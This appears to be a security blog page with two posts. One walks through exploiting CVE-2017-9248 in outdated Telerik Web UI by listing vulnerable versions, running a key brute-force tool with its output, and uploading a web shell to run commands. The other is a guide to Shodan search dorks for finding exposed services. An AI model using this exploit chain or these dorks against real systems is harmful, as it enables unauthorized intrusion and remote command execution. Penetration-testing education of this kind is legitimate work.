Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts

Pwning Web Applications via Telerik Web UI oracle

 


Introduction


Over the past months, I’ve encountered a number of web applications that were using Telerik Web UI components for their application’s interface. There’s nothing wrong with using third party components to make your application’s interface the way you want it. However, a vulnerability in these components could cause you harm.

In this post, I’m going to show you how I pwned several web applications, specifically ASP.NET ones, by abusing an outdated version of Telerik Web UI.

Identification

The simplest way to check if the application is using Telerik Web UI is to view its HTML source code.Source1

TIP #1: There are times where you’ll not find exactly the string Telerik.Web.UI from the HTML code. However, if you find the string Telerik, just keep on browsing the other pages of the application and search for the string Telerik.Web.UI again.

If you’ve identified that the application is using Telerik Web UI, the next step is to identify its version and check if it’s vulnerable to CVE-2017-9248.

Finding the version can either be easy or tricky. To get the exact version, just view the HTML code. In the case below, the version information sits right next to the string Telerik.Web.UI. That’s easy.


Source2

However, there are cases where the version is not located right next to the string “Telerik.Web.UI”. Another way to identify the version of Telerik Web UI is by going through the HTML comments just like here.Source3

O

Once you have the version information, cross-reference it with the list of vulnerable versions. Based on the exploitation tool written by Paul Taylor (@bao7uo), the following versions are affected:


2007.1423        2008.31314       2010.31317        2013.1.403        2015.2.729
2007.1521        2009.1311        2011.1315         2013.1.417        2015.2.826
2007.1626        2009.1402        2011.1413         2013.2.611        2015.3.930
2007.2918        2009.1527        2011.1519         2013.2.717        2015.3.1111
2007.2101        2009.2701        2011.2712         2013.3.1015       2016.1.113
2007.21107       2009.2826        2011.2915         2013.3.1114       2016.1.225
2007.31218       2009.31103       2011.31115        2013.3.1324       2016.2.504
2007.31314       2009.31208       2011.3.1305       2014.1.225        2016.2.607
2007.31425       2009.31314       2012.1.215        2014.1.403        2016.3.914
2008.1415        2010.1309        2012.1.411        2014.2.618        2016.3.1018
2008.1515        2010.1415        2012.2.607        2014.2.724        2016.3.1027
2008.1619        2010.1519        2012.2.724        2014.3.1024       2017.1.118
2008.2723        2010.2713        2012.2.912        2015.1.204        2017.1.228
2008.2826        2010.2826        2012.3.1016       2015.1.225        2017.2.503
2008.21001       2010.2929        2012.3.1205       2015.1.401        2017.2.621
2008.31105       2010.31109       2012.3.1308       2015.2.604        2017.2.711
2008.31125       2010.31215       2013.1.220        2015.2.623        2017.3.913

Exploitation


Before jumping to the exploitation, we have to locate first the “Dialog Handler” Telerik.Web.UI.DialogHandler.aspx. Most of the time, it’s located at the root directory of the application. If it’s not there, try the sub-directories. To verify if you’ve found the right location, you should see the string “Loading the dialog…” when accessing the dialog handler.


Loading

TIP #2: Sometimes, the sub-directory where the dialog handler is located (or where Telerik Web UI is located in general) can be found from the HTML source code.

For the exploitation, use the tool written by Paul Taylor which can be downloaded here. Credits and big thanks to him for writing this one.

Here’s an example of the tool running to bruteforce the key and discover the hidden link to access the Document Manager page.

root@ewa:~# python dp_crypto.py -k http://www.example.com/Telerik.Web.UI.DialogHandler.aspx 48 hex 9

dp_crypto by Paul Taylor / Foregenix Ltd
CVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromise

Attacking http://www.example.com/Telerik.Web.UI.DialogHandler.aspx
to find key of length [48] with accuracy threshold [9]
using key charset [01234567890ABCDEF]

Key position 01: {D} found with 31 requests, total so far: 31
Key position 02: {3} found with 10 requests, total so far: 41
Key position 03: {A} found with 35 requests, total so far: 76
Key position 04: {D} found with 46 requests, total so far: 122
<------------------------ SNIPPED ------------------------>
Key position 45: {B} found with 50 requests, total so far: 1638
Key position 46: {3} found with 36 requests, total so far: 1674
Key position 47: {3} found with 50 requests, total so far: 1724
Key position 48: {F} found with 57 requests, total so far: 1781
Found key: D3AD[redacted]B33F
Total web requests: 1781
2014.3.1024: http://www.example.com/Telerik.Web.UI.DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=[snipped&redacted]


By visiting the “Document Manager” link, we see that we now have access to all the files and folders of the web server. More importantly, we see that we can upload arbitrary files to the server.


Document Manager


Here’s an example of the shell cmd.aspx file that I uploaded.


Shell


And here’s an example of a command execution using the uploaded shell.


Shell Upload

Telewreck


As part of my learning process, I decided to create a Burp Suite extension that can detect and exploit vulnerable instances of Telerik Web UI. I named it Telewreck and is available at https://github.com/capt-meelo/Telewreck.

When running a passive scan, this extension will look for vulnerable versions of Telerik Web UI.


Passive


A tab where you can perform the exploitation part is also available.


Tab


That’s it!

Feel free to contribute in the development of the tool and report/fix some issues.

Youtube : Pandaantech

Shodan Dorks

 

Summary :

Shodan is a search engine for Internet-connected devices. It is different from search engines like Google and Bing because Google and Bing are great for finding websites but Shodan helps in finding different things like popular versions of Microsoft IIS, control servers for Malware, how many host are affected with the new CVEs, which countries are becoming more connected, SSL certificates of the websites etc.

Difference between Shodan and Google :

The major difference between Shodan and Google is that, that Shodan analyzes the internet and Google analyzes the Word Wide Web.

Description :

Shodan is the most popular search engine ever seen. It has the capability to index small desktops, CCTVs, nuclear power plants etc.

Nowadays shodan has become very popular in the world of penetration testing, bug bounties, digital forensics, threat hunting etc.

Shodan’s Search Query Insights :

Shodan gathers information by interacting with web services and this information is stored in an object called the banner, so when you search anything using a shodan dork (search query) shodan takes the information from the banner of that service and displays it to you. In simple words banner is a metadata about a service, for HTTP it means headers and for FTP it means welcome string. Different services have different banners, lets look at the example of vsftpd 3.0.3 and Siemens S7 banners.

vsftpd 3.0.3 - Banner
Siemens S7 - Banner

Shodan has two versions :
1. Web Based
2. CLI Based

Shodan command line interface (CLI) uses python library for shodan. It is been said that shodan CLI is more powerful than web-based version. There is also a slight difference between the commands being used on web version and CLI version.

How to use Web Based version (Basics) ?

  1. Go to https://account.shodan.io/login?continue=http%3A%2F%2Fwww.shodan.io%2Fdashboard and login to your account
Web Login

2. Enter your shodan dork (query) in the search bar and hit enter

Search
Shodan Dork

4. You can also filter results using response codes

Shodan Dork - Response Filtering

How to use CLI Based version (Basics) ?

  1. sudo apt install python python3 python-pip python3-pip
  2. sudo apt install python-setuptools python3-setuptools
Python Setup Tools
Completed

3. sudo pip install shodan

Shodan Installation

4. After installation I ran the command shodan count microsoft iis 6.0 which gave me an error regarding the API key, so I ran the command shodan init <API-KEY> to configure my api key

Note : I took the API key from my shodan web account

API Key

5. Then I used the command shodan scan submit --force IP to scan specific IP using shodan cli

Shodan Scan

6. For searching specific host I used the command shodan host IP

Host

Shodan Monitoring

Shodan monitoring helps you to monitor your target’s IP address. It can monitor single IP address, list of IP addresses or even net blocks (IP subnets). It will help you to identify industrial control systems, malware related services, uncommon services, open databases, iot devices, internet exposed services, expired ssl certificates, new services of your target and vulnerable cve for your target.

How to use shodan for network monitoring (CLI) ?

  1. Use the command shodan alert to check the available options
Alert options

2. Then use the command shodan alert create “TargetName” <TargetIP> to add your target for network monitoring (you can also define IP range - net blocks instead of single IP)

Adding Target for Network Monitoring

3. Then use the command shodan alert triggers to check the available triggers

Alert Triggers
Alert Triggers

4. Then use the command shodan alert list to check the alert ID

Alert ID

5. Now for enabling the alerts for your target use the command shodan alert enable <alertID> <alertNames>

Creating Alerts for Target

Domain-based Networking Monitoring

Sometimes it happens that we are not aware about the IPs or their network ranges we only have the domain name for testing so in that case shodan provides us with domain based network monitoring where we can directly use the domain name for monitoring instead of IP address or network ranges.

Instance :

  1. Use the command shodan alert domain <domainName>

The best part is that after giving the domain name shodan will automatically find all the subdomains and their IPs and will create a network monitor for them. It will keep the monitor up to date as the DNS information changes of your target and you can view your target information using the command shodan domain <domainName>

Instance :

Domain Information

How to use shodan for network monitoring (Web) ?

  1. Go to https://monitor.shodan.io/dashboard and click on “SETUP NETWORK MONITOR”
Network setup

2. Add the name and IP address of your target (you can also add net range like 104.16.100.52/32) and click on Add Network

Target Name and IP

NOTE : Here in the right side you can see 16 IPs remaining which means I can only add up to 16 IP addresses, it is because I have academic membership. Different membership will have different benefits (check here : https://account.shodan.io/billing).

3. Now click on edit and scroll down to apply trigger rules and then click on Save Changes

Editing for Trigger Rules
Trigger Rules

NOTE : I have chose the trigger rules as per bug bounty. If you are doing a pentesting you can select all of them.

4. Then click on dashboard > browse results

Dashboard
Browse Results
Results

Shodan as Browser Plug-in

Shodan has a variety of versions and till now we saw CLI based and web based versions of shodan but shodan can also be used as a browser plugin with limited functionalities compare to web and cli based versions.

Shodan browser plugin automatically detects that in which country or city the website is hosted, who owns the IP and what all services and ports are open. Apart from that it also gives you the SSL certificate, hostname, web technologies, organization name, ISP, ASN, domain records and subdomains of your target.

How to use browser plugin ?

  1. Go to https://chrome.google.com/webstore/detail/shodan/jjalcfnidlmpjhdfepjhjbhnhkbgleap/related and click on Add to Chrome
Shodan Browser Plugin - Add to Chrome

2. Click on Add extension

Add Extension

3. Now visit your target domain and click on the plugin

Target Domain
Target Information - Shodan Browser Plugin

4. Then right click on View IP Details > Open link in new tab

View IP Details
IP Details

5. For viewing domain details, right click on View domain details > Open link in new tab

View Domain Details
Domain Details

Shodan Dorks Insights :

General

  1. org

This shodan dork is used to find all the assets related to your target domain and you can also use the filtering options to remove the output you don’t want. You can use this dork when your target domain or company has a wildcard domains in scope or all the products belong to target company is in scope.

2. product

This shodan dork is used to find the target based on the specific product, for e.g. if you want to find all the domains of your target that are using the product mongodb then you can use this dork.

3. net

This shodan dork represents the CIDR notation. It is used to find out the available hosts in particular subnets, for e.g. if your target IP address is 104.16.100.52/32, here 32 is the subnet of your IP and shodan will list down all the IP address that belong to this particular subnet.

4. asn

This shodan dork is used to find all the hosts/domains of your target company. ASN is autonomous number system which will find all the internet connected assets that belongs to your target company, for e.g. go to https://hackertarget.com/as-ip-lookup/ and enter the IP of your target and it will give you the ASN number of your target then use that asn number to search for your target on shodan.

5. hostname

This shodan dork is used to find all the internet connected hosts of your target, for e.g. you entered your target as www.hackerone.com then this dork will find all the hosts with this name connected on the internet.

6. ip

This shodan dork will help you to find all of your target host that has the IP address you provided, for e.g. your ip is 104.16.100.52 then this dork will find all the hosts that belongs to particular IP.

7. all

This shodan dork is used to find all the results for the name that is passed in this dork. for e.g. if you want all the results related to tesla then this dork will help to find it out.

8. port

This shodan dork is used to find the vulnerable open ports of your target website which might leak sensitive information

HTTP

  1. http.component and http.component_category

There is a small difference between http.component and http.component_category where http.component is the name of the technology that is being used by the website for e.g. wordpress, jquery, mysql, nginx etc. and http.component_category is the name of the category of the components being used for e.g. cms, javascript libraries, databases, web servers etc.

Component and Component Category

2. http.favicon.hash

The favicon is a small icon displayed in the browser’s address bar or tab used for branding a website and we can calculate the hash of that icon by download the favicon.ico file. That hash can be used in shodan’s http.favicon.hash dork to find out the available exploit.

3. http.html

This dork is used to find the technologies and words in the source code of your target website for e.g. you want to search that the website is using drupal 8.0 or not, then you can simple pass the value in this dork and it will give you the results.

NOTE 1 : This dork is used when you know that the a particular technology’s (drupal) version is vulnerable to a particular cve.

NOTE 2 : This dork is used when your target has a huge scope of subdomains.

4. http.title

This dork is used to find whatever is written between the <title> tag of html in the website. for e.g. if you want to find the website that has grafana as a title you can use this dork. A small difference between http.title and http.html is that, that http.html will give you more results compare to http.title, so you can use either of them

Grafana

5. http.status

This dork is used to filter out the outputs based on the status code of your target for e.g. 200, 403, 301, 302, 401 etc. You can also used the status code directly without using this shodan dork, just append the status code using a + symbol but it will then search for all the possible 200 values and in the result, not only limited to status code.

6. http.waf

This dork is used to filter out your target according to web application firewall. for e.g. your target web application is using Barracuda firewall then you can use this dork to find which all web application domains of your target are using this firewall.

NOTE 1 : This dork is used when you know that a particular payload or technique exists to bypass this firewall.

NOTE 2 : This dork is used when your target has a huge scope of subdomains.

SSL

  1. ssl.alpn

Application-Layer Protocol Negotiation (ALPN) is a Transport Layer Security (TLS) extension that allows the application layer to negotiate which protocol should be performed over a secure connection. This dork can be used to identify which ALPN is being supported by the requests of your target domain. for e.g. if your target request has HTTP/2.0 and you want to check whether it supports HTTP/1.0 or HTTP/1.1 then you can use this dork.

NOTE 1 : This dork is used when you want to check for http desync/smuggling attacks

NOTE 2 : This dork is used when your target has a huge scope of subdomains.

2. ssl.cert.subject.cn and ssl.cert.issuer.cn

There is a small difference between ssl.cert.subject.cn and ssl.cert.issuer.cn where ssl.cert.subject.cn is the name of your target company or organization and ssl.cert.issuer.cn is the company that issues and verifies the certificate provided to your target company or organization.

NOTE 1 : This dork ssl.cert.issuer.cn will not be used in bug bounty.

Custom Dorks

  1. set-cookie

This custom shodan dork is used to find the values that a cookie of your target company’s request contains.

2. x-drupal-cache

This custom shodan dork is used to find for drupal caching issues for your target website.

3. access-control-allow-origin

This custom shodan dork is used to find the cross origin resource sharing issues for your target website.

4. WWW-Authenticate

This custom shodan dork will help to find the authentication related issues for your target website.

5. X-Magento-Cache-Debug

This custom shodan dork is used to find for magento caching issues for your target website.

6. kbn-name

This custom shodan dork is used to find the kibana applications for your target website.

7. x-forwarded-for and x-forwarded-host

This custom shodan dorks are used to find the header injection issues for your target website.

8. x-jenkins

This custom shodan dork is used to find the jenkins server for your target website.

NOTE 1 : You need to enumerate and look for the vulnerabilities. This dorks will not give you the direct hit to vulnerabilities.

NOTE 2 : This dorks will help you to know what vulnerabilities you can find on your target domains, if any of your target is using the above mentioned headers.

Shodan Dorking Usage Diagram

Shodan - Mindmap

Shodan Dorking (Web)

org:”target.com”
http.status:”<status_code>”
product:”<Product_Name>”
port:<Port_Number> “Service_Message”
port:<Port_Number> “Service_Name”
http.component:”<Component_Name>”
http.component_category:”<Component_Category>”
http.waf:”<firewall_name>”
http.html:”<Name>”
http.title:”<Title_Name>”
ssl.alpn:”<Protocol>”
http.favicon.hash:”<Favicon_Hash>”
net:”<Net_Range>” (for e.g. 104.16.100.52/32)
ssl.cert.subject.cn:”<Domain.com>”
asn:”<ASnumber>”
hostname:”<hostname>”
ip:”<IP_Address>”
all:”<Keyword>”
“Set-Cookie: phpMyAdmin”
“Set-Cookie: lang=”
“Set-Cookie: PHPSESSID”
“Set-Cookie: webvpn”
“Set-Cookie:webvpnlogin=1”
“Set-Cookie:webvpnLang=en”
“Set-Cookie: mongo-express=”
“Set-Cookie: user_id=”
“Set-Cookie: phpMyAdmin=”
“Set-Cookie: _gitlab_session”
“X-elastic-product: Elasticsearch”
“x-drupal-cache”
“access-control-allow-origin”
“WWW-Authenticate”
“ X-Magento-Cache-Debug”
“kbn-name: kibana”
“X-App-Name: kibana”
“x-jenkins”

URLs for Shodan Dorks (Web)

  1. http.html

https://gist.github.com/JerryShah3/8e25ecfeb9fa88784aa274d97b3cf86f

2. http.title

https://gist.github.com/JerryShah3/ccd9c8bd7eafa52b69f5a76917eec074

3. http.status

https://gist.github.com/JerryShah3/e4018ecce48eefcb8e02ebadf9468ae8

4. port

https://gist.github.com/JerryShah3/7c5cb2f25ceb3e522bfdfd0f9a68f6bb

5. http.favicon.hash

https://gist.github.com/JerryShah3/9eb4189b9b450d32c229b9c0cfbe3988

6. http.component

https://gist.github.com/JerryShah3/95d3a1baf2d29973286effb491684297

7. http.component_category

https://gist.github.com/JerryShah3/71bbbd368af846304e8588747984663b

8. http.waf

https://gist.github.com/JerryShah3/db7e47d1497d64e80c841961f3fb48b3

9. ssl.alpn

https://gist.github.com/JerryShah3/91c9fc5116bd58d3f92a454cb544b4f3

10. product

https://gist.github.com/JerryShah3/82346509de0208cf0d932e92bf20f0db

Shodan Dorking (CLI)

shodan host <IP>
shodan stats — facets port,org ssh
shodan domain <domain-name>
shodan honeyscore IP
shodan alert create “HackerOne” 104.16.100.52 (It will create an alert for the IP and will also provide an alert ID)
shodan stats --facets org discourse
shodan download --limit -1 <filename> ‘title:”IBM”’
shodan parse --fields ip_str,port,org --separator , filename.json.gz (to see the downloaded file contents by filtering it)
shodan domain hackerone.com
shodan honeyscore IP
shodan alert create “HackerOne” 104.16.100.52 (It will create an alert for the IP and will also provide an alert ID)
shodan alert create “Hyatt Hotels” 140.95.0.0/16
shodan alert enable <alert ID> new_service,open_database,vulnerable,ssl_expired,internet_scanner,uncommon
shodan alert hackerone.com

NOTE : I have not used the CLI version much so I have included the CLI dorks that I know and I have used.

Special Thanks for Proof Reading and Contributing in Dorks : Jinay Patel